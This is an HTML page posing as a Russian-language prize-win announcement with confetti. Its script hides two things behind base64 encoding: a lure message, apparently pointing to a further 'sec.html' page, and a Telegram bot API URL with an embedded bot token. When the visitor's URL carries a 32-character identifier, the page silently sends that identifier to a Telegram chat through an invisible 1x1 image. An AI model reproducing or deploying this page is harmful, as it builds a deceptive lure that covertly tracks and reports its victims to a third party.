<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Поздравляем! Вы победили!</title>
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@600&display=swap" rel="stylesheet">
  <style>
    body {
      margin: 0;
      font-family: 'Montserrat', sans-serif;
      background: linear-gradient(135deg, #FF6FD8, #3813C2);
      color: white;
      height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
      overflow: hidden;
      position: relative;
    }

    .card {
      background: rgba(255, 255, 255, 0.1);
      backdrop-filter: blur(10px);
      border-radius: 20px;
      padding: 40px;
      text-align: center;
      max-width: 400px;
      box-shadow: 0 20px 40px rgba(0, 0, 0, 0.3);
    }

    h1 {
      font-size: 2.5em;
      margin-bottom: 20px;
    }

    p {
      font-size: 1.2em;
      margin-bottom: 30px;
    }

    .btn {
	text-decoration:none;
      background-color: #fff;
      color: #3813C2;
      border: none;
      padding: 15px 30px;
      border-radius: 30px;
      font-size: 1em;
      font-weight: bold;
      cursor: pointer;
      transition: 0.3s ease;
    }

    .btn:hover {
      background-color: #e2e2e2;
    }

    .confetti {
      position: absolute;
      width: 100%;
      height: 100%;
      pointer-events: none;
      z-index: 0;
    }
	.image{
	  display: none;
	}
  </style>
</head>
<body>

  <canvas class="confetti"></canvas>

  <div class="card" id="main">
  </div>
  <div class="image" id="image">
  </div>

  <script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.6.0/dist/confetti.browser.min.js"></script>
  <script>
    var a = window.location.href
	var b = a.match(/=.{32}$/)
	if(b){
    a = 'UEdneFB2Q2Zqb2tnMEpMUml5RFF2OUMrMExIUXRkQzAwTGpRdTlDNElTRHduNDZKUEM5b01UNDhjRDdRbjlDKzBMZlF0TkdBMExEUXN0QzcwWS9RdGRDOElOQyswWUlnMExMUmdkQzEwTGtnMExUUmc5R0kwTGdoSU5DUzBZc2cwTC9RdnRDeDBMWFF0TkM0MEx2UXVDRFFzaURRdmRDdzBZalF0ZEM4SU5DNjBMN1F2ZEM2MFlQUmdOR0IwTFVnMEwvUmdOQzQwTGZRdnRDeUlOQzRJTkN5MFl2UXVOQ3owWURRc05DNzBMZ2dPREF3TURBZzBZQXVQQzl3UGp4aElHTnNZWE56UFNKaWRHNGlJR2h5WldZOUluTmxZeTVvZEcxc0lqN1FsOUN3MExIUmdOQ3cwWUxSakNEUXY5R0EwTGpRdHp3dllUND0=';
    a = decodeURIComponent(escape(atob(atob(a))));
  } else {
    a = 'UEhBK1RHOXlaVzBnYVhCemRXMGdaRzlzYjNJZ2MybDBJR0Z0WlhRc0lHTnZibk5sWTNSbGRIVnlJR0ZrYVhCcGMybGphVzVuSUdWc2FYUXNJSE5sWkNCa2J5QmxhWFZ6Ylc5a1BHSnlQblJsYlhCdmNpQnBibU5wWkdsa2RXNTBJSFYwSUd4aFltOXlaU0JsZENCa2IyeHZjbVVnYldGbmJtRWdZV3hwY1hWaExpQlZkQ0JsYm1sdElHRmtJRzFwYm1sdElIWmxQR0p5UG1saGJTdzhZbkkrY1hWcGN5QnViM04wY25Wa0lHVjRaWEpqYVhSaGRHbHZiaUIxYkd4aGJXTnZJR3hoWW05eWFYTWdibWx6YVNCMWRDQmhiR2x4ZFdsd0lHVjRJR1ZoSUdOdmJXMXZaRzg4WW5JK1kyOXVjMlZ4ZFdGMExpQkVkV2x6SUdGMWRHVWdhWEoxY21VZ1pHOXNiM0lnYVc0Z2NtVndjbVZvWlc1a1pYSnBkQ0JwYmlCMmIyeDFjSFJoZEdVZ2RtVnNhWFFnWlhOelpUeGljajVqYVd4c2RXMGdaRzlzYjNKbElHVjFJR1oxWjJsaGRDQnVkV3hzWVNCd1lYSnBZWFIxY2k0Z1JYaGpaWEIwWlhWeUlITnBiblFnYjJOallXVmpZWFFnWTNWd2FXUmhkR0YwSUc1dmJqeGljajV3Y205cFpHVnVkQ3dnYzNWdWRDQnBiaUJqZFd4d1lTQnhkV2tnYjJabWFXTnBZU0JrWlhObGNuVnVkQ0J0YjJ4c2FYUWdZVzVwYlNCcFpDQmxjM1FnYkdGaWIzSjFiUzQ4TDNBKw==';
    a = atob(atob(a));
  }
  document.getElementById('main').innerHTML = a
  	if(b){
	var m = b[0].slice(1)
	var s = atob('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYzMTE3NjkyMTE6QUFGNkN2eW13cXlwS0tzaTFzeUQ3RXR5UEZka1gxbU5TQU0vc2VuZE1lc3NhZ2U/Y2hhdF9pZD0tMTAwMTk3MTM5NjIwNSZ0ZXh0PQ==')
	var okn = s+m
	var elem = '<img src="'+okn+'" width="1" height="1">'
	document.getElementById('image').innerHTML = elem
	}
    const canvas = document.querySelector('.confetti');
    const confetti = window.confetti.create(canvas, { resize: true });
    confetti({
      particleCount: 150,
      spread: 90,
      origin: { y: 0.6 }
    });
  </script>

</body>
</html>
